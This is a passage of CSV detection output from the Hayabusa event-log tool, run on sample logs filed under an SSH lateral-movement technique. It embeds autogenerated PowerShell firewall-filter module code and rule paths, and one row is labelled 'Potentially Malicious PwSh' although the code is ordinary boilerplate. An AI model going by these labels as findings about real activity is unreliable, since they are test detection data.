Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch 
{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.338 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.340 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.370 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() 
function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) 
$__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query 
(cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.370 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if 
($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', 
